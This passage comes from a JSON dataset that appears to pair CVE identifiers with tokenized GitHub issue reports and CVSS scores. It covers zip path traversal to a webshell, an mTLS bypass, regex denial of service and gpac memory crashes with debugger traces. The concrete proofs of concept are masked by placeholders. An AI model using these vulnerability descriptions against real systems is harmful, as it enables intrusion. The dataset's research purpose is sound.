        "impactScore": 5.9,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2021-34128",
        "Issue_Url_old": "https://github.com/bettershop/LaikeTui/issues/8",
        "Issue_Url_new": "https://github.com/bettershop/laiketui/issues/8",
        "Repo_new": "bettershop/laiketui",
        "Issue_Created_At": "2021-05-28T16:10:44Z",
        "description": "Compressed file upload getshell. The cause of the vulnerability: When decompressing, the compressed files were not filtered and judged, which resulted in the possibility of uploading cross directory zip files to getshell. FILETAG Vulnerability Recurrence:: Log in to the background and PATHTAG To upload a compressed file, put the malicious file that can be traversed into a zip, upload and decompress it. FILETAG FILETAG Then access the path of the malicious file: FILETAG poc\uff1a ERRORTAG Upload was successful and executed successfully!",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 8.8,
        "impactScore": 5.9,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2021-34557",
        "Issue_Url_old": "https://github.com/QubesOS/qubes-issues/issues/6595",
        "Issue_Url_new": "https://github.com/qubesos/qubes-issues/issues/6595",
        "Repo_new": "qubesos/qubes-issues",
        "Issue_Created_At": "2021-05-11T00:39:44Z",
        "description": "Xscreensaver dies unexpectedly, cannot lock screen . APITAG Qubes OS version APITAG NUMBERTAG Affected component(s) or functionality APITAG Screensaver, locking with Ctrl Alt L Brief summary APITAG Nothing happens when trying to lock the screen. No logs. Screensaver IS set to autostart already. And it works for some time. But after some time, (not sure about the exact cause), inactivity timer does not lock the screen, nor the screen lock shortcut works. When I open the Xfce Screensaver panel, it complains about the screensaver daemon being not running. Even after starting the daemon, same thing happens after some time. As there is no log at all, I cannot trace the cause. How Reproducible APITAG This started a few days ago, probably after applying a UEFI firmware update. The bug is always present since then, I guess. To Reproduce Steps to reproduce the behavior NUMBERTAG boot the system NUMBERTAG log in. do some work NUMBERTAG the computer won't lock when you expect it to lock its screen Expected behavior APITAG The lock should work. Actual behavior APITAG Lock is disabled Screenshots APITAG Additional context APITAG It might be considered a security issue as well, I did not notice that the screen was not locked but had the impression that it was. Solutions you've tried APITAG starting the xscreensaver using the respective xfce settings panel Relevant documentation URLTAG you've consulted APITAG Found some basic info that suggests to restart the screensaver, to put it into autostart (which already appears in session and startup panel as a ticked item) Related, non duplicate CVETAG issues APITAG (could not find any)",
        "vectorString": "CVSS:3.1/AV:P/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 4.6,
        "impactScore": 3.6,
        "exploitabilityScore": 0.9
    },
    {
        "CVE_ID": "CVE-2021-36371",
        "Issue_Url_old": "https://github.com/emissary-ingress/emissary/issues/3340",
        "Issue_Url_new": "https://github.com/emissary-ingress/emissary/issues/3340",
        "Repo_new": "emissary-ingress/emissary",
        "Issue_Created_At": "2021-04-13T21:29:23Z",
        "description": "Bypass mTLS by mixing SNI and Host headers. Describe the bug If Ambassador is deployed with multiple hosts/tlscontexts with some using mTLS ( APITAG ) and some not, it is possible to bypass the mTLS requirements for the backends that have it configured by sending an SNI for a APITAG that does not. I believe this stems from the fact that Ambassador matches APITAG based on SNI, but Mappings based on Host header. If APITAG does not require mTLS but APITAG does, it looks like its possible to talk directly to APITAG without a valid client certificate by doing something like: APITAG In some configurations it is also possible to do the same by just talking directly to the Ambassador APITAG IP address (not sending SNI at all). This works if the \"default\" APITAG does not require mTLS (I'm not exactly clear what APITAG Ambassador will fall back on if no SNI is given) To Reproduce I've put together a working minimal example with NUMBERTAG services and the YAML configurations: URLTAG ERRORTAG Expected behavior Ambassador should not apply a Host mapping if the SNI does not match. If this is expected behavior and you can't securely mix mTLS and non mTLS upstreams this should definitely be called out in the docs for those who need to rely on mTLS authentication. Versions (please complete the following information): Ambassador NUMBERTAG Kubernetes environment: EKS and APITAG Version NUMBERTAG and NUMBERTAG Additional context It is possible my configuration is bad/wrong, so if I have missed something in the docs please let me know",
        "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:L/A:N",
        "severity": "LOW",
        "baseScore": 3.7,
        "impactScore": 1.4,
        "exploitabilityScore": 2.2
    },
    {
        "CVE_ID": "CVE-2021-38244",
        "Issue_Url_old": "https://github.com/cBioPortal/cbioportal/issues/8680",
        "Issue_Url_new": "https://github.com/cbioportal/cbioportal/issues/8680",
        "Repo_new": "cbioportal/cbioportal",
        "Issue_Created_At": "2021-06-10T19:32:01Z",
        "description": "[SECURITY] Denial of service because of unsafe regex processing. I have tried to contact you by EMAILTAG skcc.org and asked for any other email in URLTAG Nobody replied. The APITAG is vulnerable to regex injection that may lead to Denial of Service. User controlled heatmap and alteration are used to build and run a regex expression: URLTAG The value end up in APITAG URLTAG Since the attacker controls the string and the regex pattern he may cause a APITAG by regex catastrophic backtracking on the server side.",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
        "severity": "HIGH",
        "baseScore": 7.5,
        "impactScore": 3.6,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2021-40564",
        "Issue_Url_old": "https://github.com/gpac/gpac/issues/1898",
        "Issue_Url_new": "https://github.com/gpac/gpac/issues/1898",
        "Repo_new": "gpac/gpac",
        "Issue_Created_At": "2021-08-26T11:34:51Z",
        "description": "Segmentation fault caused by null pointer dereference using mp4box in avc_parse_slice, APITAG FILETAG (unzip first) Here is the trace reported by gdb: ~~~~ Stopped reason: SIGSEGV gef\u27a4 bt NUMBERTAG bcd NUMBERTAG d in avc_parse_slice (svc_idr_flag=GF_FALSE, si NUMBERTAG fffffff NUMBERTAG avc NUMBERTAG ae NUMBERTAG bs NUMBERTAG df NUMBERTAG at PATHTAG NUMBERTAG gf_avc_parse_nalu (bs NUMBERTAG df NUMBERTAG avc NUMBERTAG ae NUMBERTAG at PATHTAG NUMBERTAG d in naludmx_parse_nal_avc (is_islice=<synthetic pointer>, is_slice=<synthetic pointer>, skip_nal=<synthetic pointer>, nal_type NUMBERTAG size NUMBERTAG f, data NUMBERTAG e5b NUMBERTAG ct NUMBERTAG ada NUMBERTAG at PATHTAG NUMBERTAG naludmx_process (filter NUMBERTAG a0bd0) at PATHTAG NUMBERTAG fe4c NUMBERTAG in gf_filter_process_task (task NUMBERTAG d NUMBERTAG at PATHTAG NUMBERTAG f7b NUMBERTAG in gf_fs_thread_proc APITAG at PATHTAG NUMBERTAG f NUMBERTAG in gf_fs_run (fsess=fsess APITAG at PATHTAG NUMBERTAG c NUMBERTAG b4b in gf_media_import APITAG at PATHTAG NUMBERTAG in convert_file_info APITAG \"tmp\", APITAG at PATHTAG NUMBERTAG aaa in APITAG (argc=<optimized out>, argv=<optimized out>) at PATHTAG NUMBERTAG f NUMBERTAG bb6 in generic_start_main NUMBERTAG f NUMBERTAG a5 in __libc_start_main NUMBERTAG c4e9 in _start () ~~~~ The reason for this bug is that the program does not check the nullity of the pointer. APITAG",
        "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 5.5,
        "impactScore": 3.6,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2021-40568",
        "Issue_Url_old": "https://github.com/gpac/gpac/issues/1900",
        "Issue_Url_new": "https://github.com/gpac/gpac/issues/1900",
        "Repo_new": "gpac/gpac",
        "Issue_Created_At": "2021-08-27T09:14:32Z",
        "description": "Segmentation fault caused by buffer overflow using mp4box in svc_parse_slice, APITAG FILETAG (unzip first) Program output: ~~~~ APITAG exp golomb read failed, not enough bits in bitstream ! APITAG exp golomb read failed, not enough bits in bitstream ! APITAG exp golomb read failed, not enough bits in bitstream ! APITAG exp golomb read failed, not enough bits in bitstream ! APITAG exp golomb read failed, not enough bits in bitstream ! APITAG exp golomb read failed, not enough bits in bitstream ! APITAG exp golomb read failed, not enough bits in bitstream ! APITAG exp golomb read failed, not enough bits in bitstream ! APITAG exp golomb read failed, not enough bits in bitstream ! APITAG exp golomb read failed, not enough bits in bitstream ! APITAG exp golomb read failed, not enough bits in bitstream ! [AVC|H NUMBERTAG Warning: Error parsing NAL unit [AVC|H NUMBERTAG Error parsing Sequence Param Set [AVC|H NUMBERTAG Warning: Error parsing NAL unit [AVC|H NUMBERTAG Error parsing Sequence Param Set APITAG exp golomb read failed, not enough bits in bitstream ! APITAG exp golomb read failed, not enough bits in bitstream ! APITAG exp golomb read failed, not enough bits in bitstream ! APITAG exp golomb read failed, not enough bits in bitstream ! APITAG exp golomb read failed, not enough bits in bitstream ! APITAG exp golomb read failed, not enough bits in bitstream ! APITAG exp golomb read failed, not enough bits in bitstream ! APITAG exp golomb read failed, not enough bits in bitstream ! APITAG exp golomb read failed, not enough bits in bitstream ! APITAG exp golomb read failed, not enough bits in bitstream ! [AVC|H NUMBERTAG Warning: Error parsing NAL unit Segmentation fault (core dumped) ~~~~ Here is the trace reported by gdb: ~~~~ Stopped reason: SIGSEGV gef\u27a4 bt NUMBERTAG bccc NUMBERTAG in svc_parse_slice (si NUMBERTAG fffffff NUMBERTAG avc NUMBERTAG ae NUMBERTAG bs NUMBERTAG de0) at PATHTAG NUMBERTAG gf_avc_parse_nalu (bs NUMBERTAG de0, avc NUMBERTAG ae NUMBERTAG at PATHTAG NUMBERTAG d in naludmx_parse_nal_avc (is_islice=<synthetic pointer>, is_slice=<synthetic pointer>, skip_nal=<synthetic pointer>, nal_type NUMBERTAG size NUMBERTAG c, data NUMBERTAG b NUMBERTAG a1 \"trak\", ct NUMBERTAG ada NUMBERTAG at PATHTAG NUMBERTAG naludmx_process (filter NUMBERTAG a0bd0) at PATHTAG NUMBERTAG fe4c NUMBERTAG in gf_filter_process_task (task NUMBERTAG e NUMBERTAG at PATHTAG NUMBERTAG f7b NUMBERTAG in gf_fs_thread_proc APITAG at PATHTAG NUMBERTAG f NUMBERTAG in gf_fs_run (fsess=fsess APITAG at PATHTAG NUMBERTAG c NUMBERTAG b4b in gf_media_import APITAG at PATHTAG NUMBERTAG in convert_file_info APITAG \"tmp\", APITAG at PATHTAG NUMBERTAG aaa in APITAG (argc=<optimized out>, argv=<optimized out>) at PATHTAG NUMBERTAG f NUMBERTAG bb6 in generic_start_main NUMBERTAG f NUMBERTAG a5 in __libc_start_main NUMBERTAG c4e9 in _start () ~~~~",
        "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 7.8,
        "impactScore": 5.9,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2021-40570",
        "Issue_Url_old": "https://github.com/gpac/gpac/issues/1899",
        "Issue_Url_new": "https://github.com/gpac/gpac/issues/1899",
        "Repo_new": "gpac/gpac",
        "Issue_Created_At": "2021-08-27T09:02:37Z",
        "description": "Segmentation fault caused by buffer overflow using mp4box in avc_compute_poc, APITAG FILETAG (unzip first) Program output: ~~~~ APITAG exp golomb read failed, not enough bits in bitstream ! APITAG exp golomb read failed, not enough bits in bitstream ! APITAG exp golomb read failed, not enough bits in bitstream ! APITAG exp golomb read failed, not enough bits in bitstream ! APITAG exp golomb read failed, not enough bits in bitstream ! [avc h NUMBERTAG offset_for_ref_frame overflow from poc_cycle_length [AVC|H NUMBERTAG Warning: Error parsing NAL unit [AVC|H NUMBERTAG Error parsing Sequence Param Set APITAG exp golomb read failed, not enough bits in bitstream ! APITAG exp golomb read failed, not enough bits in bitstream ! APITAG exp golomb read failed, not enough bits in bitstream ! APITAG exp golomb read failed, not enough bits in bitstream ! Segmentation fault (core dumped) ~~~~ Here is the trace reported by gdb: ~~~~ Stopped reason: SIGSEGV gef\u27a4 bt NUMBERTAG b NUMBERTAG f NUMBERTAG in avc_compute_poc (si=si APITAG at PATHTAG NUMBERTAG bce NUMBERTAG in gf_avc_parse_nalu (bs=<optimized out>, avc NUMBERTAG ae NUMBERTAG at PATHTAG NUMBERTAG d in naludmx_parse_nal_avc (is_islice=<synthetic pointer>, is_slice=<synthetic pointer>, skip_nal=<synthetic pointer>, nal_type NUMBERTAG size NUMBERTAG f, data NUMBERTAG dfba PATHTAG <incomplete sequence NUMBERTAG ct NUMBERTAG ada NUMBERTAG at PATHTAG NUMBERTAG naludmx_process (filter NUMBERTAG a0bd0) at PATHTAG NUMBERTAG fe4c NUMBERTAG in gf_filter_process_task (task NUMBERTAG ed0) at PATHTAG NUMBERTAG f7b NUMBERTAG in gf_fs_thread_proc APITAG at PATHTAG NUMBERTAG f NUMBERTAG in gf_fs_run (fsess=fsess APITAG at PATHTAG NUMBERTAG c NUMBERTAG b4b in gf_media_import APITAG at PATHTAG NUMBERTAG in convert_file_info APITAG \"tmp\", APITAG at PATHTAG NUMBERTAG aaa in APITAG (argc=<optimized out>, argv=<optimized out>) at PATHTAG NUMBERTAG f NUMBERTAG bb6 in generic_start_main NUMBERTAG f NUMBERTAG a5 in __libc_start_main NUMBERTAG c4e9 in _start () ~~~~ The reason for this bug is that the program does not check whether the length of a buffer fit its actual size. APITAG",
        "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 7.8,
        "impactScore": 5.9,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2021-40571",
        "Issue_Url_old": "https://github.com/gpac/gpac/issues/1895",
        "Issue_Url_new": "https://github.com/gpac/gpac/issues/1895",
        "Repo_new": "gpac/gpac",
        "Issue_Created_At": "2021-08-26T09:51:24Z",
        "description": "Segmentation fault using mp4box in ilst_box_read, APITAG FILETAG (unzip first) Here is the trace reported by gdb: ~~~~ Stopped reason: SIGSEGV gef\u27a4 bt NUMBERTAG in ilst_box_read (s NUMBERTAG f NUMBERTAG bs NUMBERTAG c NUMBERTAG at PATHTAG NUMBERTAG ff1fa in gf_isom_box_read (bs NUMBERTAG c NUMBERTAG a NUMBERTAG f NUMBERTAG at PATHTAG NUMBERTAG gf_isom_box_parse_ex APITAG bs=bs APITAG APITAG parent_type NUMBERTAG at PATHTAG NUMBERTAG cf2 in gf_isom_parse_root_box APITAG bs NUMBERTAG c NUMBERTAG box_type=box_type APITAG APITAG APITAG at PATHTAG NUMBERTAG f in APITAG (mov=mov APITAG APITAG APITAG APITAG at PATHTAG NUMBERTAG e NUMBERTAG in gf_isom_parse_movie_boxes (progressive_mode=GF_FALSE, APITAG APITAG mo NUMBERTAG c NUMBERTAG at PATHTAG NUMBERTAG gf_isom_open_file APITAG \"tmp\", APITAG out>, tmp_dir NUMBERTAG at PATHTAG NUMBERTAG a NUMBERTAG in APITAG (argc=<optimized out>, argv=<optimized out>) at PATHTAG NUMBERTAG f NUMBERTAG bb6 in generic_start_main NUMBERTAG f NUMBERTAG a5 in __libc_start_main NUMBERTAG c4e9 in _start () ~~~~",
        "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 7.8,
        "impactScore": 5.9,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2021-40574",
        "Issue_Url_old": "https://github.com/gpac/gpac/issues/1897",
        "Issue_Url_new": "https://github.com/gpac/gpac/issues/1897",
        "Repo_new": "gpac/gpac",
        "Issue_Created_At": "2021-08-26T11:19:33Z",
        "description": "System abort APITAG dumped) caused by buffer overflow using APITAG in gf_text_get_utf8_line. FILETAG (unzip first) This is the output of the program: ~~~~ stack smashing detected : APITAG terminated Aborted (core dumped) ~~~~ Here is the trace reported by gdb (the stack is smashed): ~~~~ Stopped reason: SIGABRT gef\u27a4 bt NUMBERTAG f NUMBERTAG d NUMBERTAG in raise NUMBERTAG f NUMBERTAG f3a in abort NUMBERTAG f NUMBERTAG ed6 in __libc_message NUMBERTAG f NUMBERTAG a NUMBERTAG in __fortify_fail NUMBERTAG f NUMBERTAG a3e in __stack_chk_fail NUMBERTAG f3ad in gf_text_get_utf8_line APITAG out>, APITAG out>, txt_in=<optimized out>, unicode_type NUMBERTAG at PATHTAG NUMBERTAG c NUMBERTAG c3a5c NUMBERTAG e in NUMBERTAG bcc NUMBERTAG fc NUMBERTAG in NUMBERTAG e NUMBERTAG c3aac3 in NUMBERTAG ec3a0c3a7c NUMBERTAG e in NUMBERTAG bdcd NUMBERTAG a5c3 in NUMBERTAG ac NUMBERTAG e in gf_isom_load_extra_boxes (movie NUMBERTAG c NUMBERTAG f NUMBERTAG c NUMBERTAG aacc2, moov_boxes=<optimized out>, moov_boxes_size=<optimized out>, udta_only=(unknown NUMBERTAG at PATHTAG NUMBERTAG in ?? () ~~~~",
        "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 7.8,
        "impactScore": 5.9,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2021-40575",
        "Issue_Url_old": "https://github.com/gpac/gpac/issues/1905",
        "Issue_Url_new": "https://github.com/gpac/gpac/issues/1905",
        "Repo_new": "gpac/gpac",
        "Issue_Created_At": "2021-09-01T06:02:21Z",
        "description": "Segmentation fault casued by null pointer dereference using mp4box in mpgviddmx_process, APITAG FILETAG (unzip first) Here is the trace reported by gdb: ~~~~ Stopped reason: SIGSEGV gef\u27a4 bt NUMBERTAG a NUMBERTAG in memcpy (__len NUMBERTAG ffffffffffffffff, __src NUMBERTAG ada NUMBERTAG dest NUMBERTAG a NUMBERTAG at PATHTAG NUMBERTAG mpgviddmx_process (filter NUMBERTAG a0bd0) at PATHTAG NUMBERTAG fe3e NUMBERTAG in gf_filter_process_task (task NUMBERTAG f NUMBERTAG at PATHTAG NUMBERTAG f7ab NUMBERTAG in gf_fs_thread_proc APITAG at PATHTAG NUMBERTAG f NUMBERTAG b8 in gf_fs_run (fsess=fsess APITAG at PATHTAG NUMBERTAG c NUMBERTAG c8b in gf_media_import APITAG at PATHTAG NUMBERTAG in convert_file_info APITAG \"tmp\", APITAG at PATHTAG NUMBERTAG aaa in APITAG (argc=<optimized out>, argv=<optimized out>) at PATHTAG NUMBERTAG f NUMBERTAG in generic_start_main NUMBERTAG f NUMBERTAG f NUMBERTAG in __libc_start_main NUMBERTAG c4e9 in _start () ~~~~ Here is the trace reported by ASAN NUMBERTAG ERROR: APITAG negative size param: (size NUMBERTAG fdaf NUMBERTAG ff NUMBERTAG PATHTAG NUMBERTAG fdaf NUMBERTAG f1c in memcpy PATHTAG NUMBERTAG fdaf NUMBERTAG f1c in mpgviddmx_process PATHTAG NUMBERTAG fdaf NUMBERTAG efa0 in gf_filter_process_task PATHTAG NUMBERTAG fdaf NUMBERTAG f0e2 in gf_fs_thread_proc PATHTAG NUMBERTAG fdaf NUMBERTAG fb0 in gf_fs_run PATHTAG NUMBERTAG fdaf1ff NUMBERTAG f5 in gf_media_import PATHTAG NUMBERTAG ce NUMBERTAG c NUMBERTAG f in convert_file_info PATHTAG NUMBERTAG ce NUMBERTAG c NUMBERTAG in APITAG PATHTAG NUMBERTAG fdaef9a6bf6 in __libc_start_main ( PATHTAG NUMBERTAG ce NUMBERTAG be NUMBERTAG f9 in _start ( PATHTAG NUMBERTAG is located NUMBERTAG bytes to the right of NUMBERTAG byte region APITAG allocated by thread T0 here NUMBERTAG fdaf NUMBERTAG b NUMBERTAG in __interceptor_malloc ( PATHTAG NUMBERTAG fdaf NUMBERTAG a NUMBERTAG in filein_initialize PATHTAG NUMBERTAG fdaf NUMBERTAG b0f0 in gf_filter_new_finalize PATHTAG NUMBERTAG fdaf NUMBERTAG f NUMBERTAG in gf_filter_new PATHTAG NUMBERTAG fdaf NUMBERTAG in APITAG PATHTAG NUMBERTAG fdaf NUMBERTAG a NUMBERTAG in gf_fs_load_source PATHTAG NUMBERTAG fdaf1ff NUMBERTAG a6 in gf_media_import PATHTAG NUMBERTAG ce NUMBERTAG c NUMBERTAG f in convert_file_info PATHTAG NUMBERTAG ce NUMBERTAG c NUMBERTAG in APITAG PATHTAG NUMBERTAG fdaef9a6bf6 in __libc_start_main ( PATHTAG ) SUMMARY: APITAG negative size param ( PATHTAG NUMBERTAG ABORTING ~~~~",
        "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 5.5,
        "impactScore": 3.6,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2021-40609",
        "Issue_Url_old": "https://github.com/gpac/gpac/issues/1894",
        "Issue_Url_new": "https://github.com/gpac/gpac/issues/1894",
        "Repo_new": "gpac/gpac",
        "Issue_Created_At": "2021-08-26T04:44:12Z",
        "description": "heap buffer overflow in MP4BOX at souce file PATHTAG FILETAG",
        "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 5.5,
        "impactScore": 3.6,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2021-41131",
        "Issue_Url_old": "https://github.com/theupdateframework/python-tuf/issues/1527",
        "Issue_Url_new": "https://github.com/theupdateframework/python-tuf/issues/1527",
        "Repo_new": "theupdateframework/python-tuf",
        "Issue_Created_At": "2021-08-20T18:14:23Z",
        "description": "Metadata API: Delegation role names validation. Description of issue or feature request : Delegation role names are not restricted in any way in the spec, but they are targets metadata role names. They could be APITAG , APITAG or APITAG . The problem is that at some point those delegation role names are used when constructing an URL used to download the delegated target metadata file: URLTAG which is likely to be a problem. Current behavior : No validation is used for Delegation role names. Expected behavior : Escape special symbols like APITAG or APITAG .",
        "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:C/C:N/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 8.7,
        "impactScore": 5.8,
        "exploitabilityScore": 2.2
    },
    {
        "CVE_ID": "CVE-2021-41232",
        "Issue_Url_old": "https://github.com/github/securitylab/issues/464",
        "Issue_Url_new": "https://github.com/github/securitylab/issues/464",
        "Repo_new": "github/securitylab",
        "Issue_Created_At": "2021-10-29T07:59:45Z",
        "description": "GO]: [ CVETAG : LDAP Injection All For One]. Query Relevant PR: URLTAG Report Constructing LDAP names or search filters directly from tainted data enables attackers to inject specially crafted values that changes the initial meaning of the name or filter itself. Successful LDAP injections attacks can read, modify or delete sensitive information from the directory service. This query identifies cases in which a LDAP query executes user provided input without being sanitized before. [x] Are you planning to discuss this vulnerability submission publicly? APITAG Post, social networks, etc). We would love to have you spread the word about the good work you are doing Result(s) Provide at least one useful result found by your query, on some revision of a real project. [go real world web URLTAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2021-41241",
        "Issue_Url_old": "https://github.com/nextcloud/groupfolders/issues/1692",
        "Issue_Url_new": "https://github.com/nextcloud/groupfolders/issues/1692",
        "Repo_new": "nextcloud/groupfolders",
        "Issue_Created_At": "2021-10-11T13:47:33Z",
        "description": "Groupfolders for which a user has no reading rights APITAG Permissions) can still be copied and read out!. Example: Employee list / NC users: MA1 site manager MA2 accountant MA3 project employee Lisa MA4 project employee Hans NC folder structure (group folder): Group folder company location Berlin ...\u251c\u2500\u2500 Administration ..........\u251c\u2500\u2500 accounting ...\u251c\u2500\u2500 projects ..........\u251c\u2500\u2500 Project A ..........\u251c\u2500\u2500 Project B The following should be set via APITAG Permissions\u201d: Write and read rights to all folders should have: MA1 site manager Write and read rights to accounting folders should have: only MA2 accountant Write and read rights to project folder A should have: only MA3 project employee Lisa Write and read rights to project folder B should have: only MA4 project employee Hans All of this is easy to set using the APITAG Permissions\u201d in the APITAG However\u2026 For the root folder APITAG folder company location Berlin\u201d, all NC users must have at least reading rights, otherwise you won\u2019t see a folder at all\u2026 \u201cMA4 Projektmitarbeiter Hans\u201d does not initially see the APITAG Accounting\u201d folder. However, if he copies the complete root directory APITAG folder company location Berlin\u201d and inserts it into another of his own folders, all directories and their contents are visible to him. Can this copying of the \u201cinvisible\u201d folder or in general be prevented somehow? How would you solve this problem? Thank\u2019s for the Tipps. Matthias",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N",
        "severity": "MEDIUM",
        "baseScore": 4.3,
        "impactScore": 1.4,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2021-41392",
        "Issue_Url_old": "https://github.com/BoostIO/BoostNote-App/issues/856",
        "Issue_Url_new": "https://github.com/boostio/boostnote-app/issues/856",
        "Repo_new": "boostio/boostnote-app",
        "Issue_Created_At": "2021-03-09T15:02:25Z",
        "description": "Potential Command Execution vulnerabilities introduced by FILETAG . Hi, We found that APITAG introduces dangerous API APITAG for arbitrary access on unsafe renderer process. This may lead to remote command execution. We suggest that a URL check should be enforced at L NUMBERTAG which enforces an allowlist on trusted URLs. URLTAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2021-41571",
        "Issue_Url_old": "https://github.com/apache/pulsar/issues/11814",
        "Issue_Url_new": "https://github.com/apache/pulsar/issues/11814",
        "Repo_new": "apache/pulsar",
        "Issue_Created_At": "2021-08-27T07:58:36Z",
        "description": "FILETAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N",
        "severity": "MEDIUM",
        "baseScore": 6.5,
        "impactScore": 3.6,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2021-42054",
        "Issue_Url_old": "https://github.com/xebd/accel-ppp/issues/156",
        "Issue_Url_new": "https://github.com/xebd/accel-ppp/issues/156",
        "Repo_new": "xebd/accel-ppp",
        "Issue_Created_At": "2021-10-06T09:29:07Z",
        "description": "The stack buffer underflow bug can be triggered even by remote client. Using version APITAG . The issue NUMBERTAG can be triggered even by remote client. Steps to reproduce NUMBERTAG Build access ppp: CODETAG NUMBERTAG Run APITAG , use pptp server: APITAG The running configuration APITAG is: ERRORTAG use APITAG and the APITAG is as follows: APITAG NUMBERTAG Install pptp client: APITAG NUMBERTAG Run the client: APITAG APITAG we need to follow the forked subprocesses and control them, therefore we used the APITAG to execute the pptp client instead of simply using APITAG NUMBERTAG Kill ( APITAG ) the client after authentication succeeded. Then the APITAG will crash due to ERRORTAG . ERRORTAG The detailed log of APITAG is shown in FILETAG .",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
        "severity": "HIGH",
        "baseScore": 7.5,
        "impactScore": 3.6,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2021-42203",
        "Issue_Url_old": "https://github.com/matthiaskramm/swftools/issues/176",
        "Issue_Url_new": "https://github.com/matthiaskramm/swftools/issues/176",
        "Repo_new": "matthiaskramm/swftools",
        "Issue_Created_At": "2021-10-07T13:21:58Z",
        "description": "heap use after free exists in the function APITAG in swftext.c. system info Ubuntu NUMBERTAG clang NUMBERTAG swfdump (latest master a9d NUMBERTAG Command line PATHTAG D APITAG APITAG output NUMBERTAG ERROR: APITAG heap use after free on address NUMBERTAG d6a0 at pc NUMBERTAG d bp NUMBERTAG fffffffd NUMBERTAG sp NUMBERTAG fffffffd NUMBERTAG WRITE of size NUMBERTAG at NUMBERTAG d6a0 thread T NUMBERTAG c in APITAG APITAG NUMBERTAG c NUMBERTAG in APITAG APITAG NUMBERTAG a NUMBERTAG in APITAG APITAG NUMBERTAG c2dc in fontcallback2 PATHTAG NUMBERTAG c6 in APITAG APITAG NUMBERTAG in main PATHTAG NUMBERTAG ffff NUMBERTAG a NUMBERTAG f in __libc_start_main ( PATHTAG NUMBERTAG c NUMBERTAG in _start ( PATHTAG NUMBERTAG d6a0 is located NUMBERTAG bytes inside of NUMBERTAG byte region APITAG freed by thread T0 here NUMBERTAG ffff6f NUMBERTAG ca in __interceptor_free ( PATHTAG NUMBERTAG db2c in APITAG PATHTAG NUMBERTAG PATHTAG ) previously allocated by thread T0 here NUMBERTAG ffff6f NUMBERTAG a in __interceptor_calloc ( PATHTAG NUMBERTAG c in rfx_calloc PATHTAG NUMBERTAG PATHTAG ) SUMMARY: APITAG heap use after free APITAG APITAG Shadow bytes around the buggy address NUMBERTAG c0c7fff9a NUMBERTAG fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG c0c7fff9a NUMBERTAG fa fa fa fa fa fa fa fa NUMBERTAG fa NUMBERTAG c0c7fff9aa0: fa fa fa fa NUMBERTAG fa fa fa fa fa NUMBERTAG c0c7fff9ab NUMBERTAG fa fa fa fa fa NUMBERTAG c0c7fff9ac NUMBERTAG fa fa fa fa fa NUMBERTAG c0c7fff9ad0: fa fa fa fa[fd]fd fd fd fd fd fd fa fa fa fa fa NUMBERTAG c0c7fff9ae NUMBERTAG fa fa fa fa fa NUMBERTAG c0c7fff9af NUMBERTAG fa fa fa fa fa NUMBERTAG fa NUMBERTAG c0c7fff9b NUMBERTAG fa fa fa fa NUMBERTAG fa fa fa fa fa NUMBERTAG c0c7fff9b NUMBERTAG fa fa fa fa fa NUMBERTAG c0c7fff9b NUMBERTAG fa fa fa fa NUMBERTAG fa Shadow byte legend (one shadow byte represents NUMBERTAG application bytes): Addressable NUMBERTAG Partially addressable NUMBERTAG Heap left redzone: fa Heap right redzone: fb Freed heap region: fd Stack left redzone: f1 Stack mid redzone: f2 Stack right redzone: f3 Stack partial redzone: f4 Stack after return: f5 Stack use 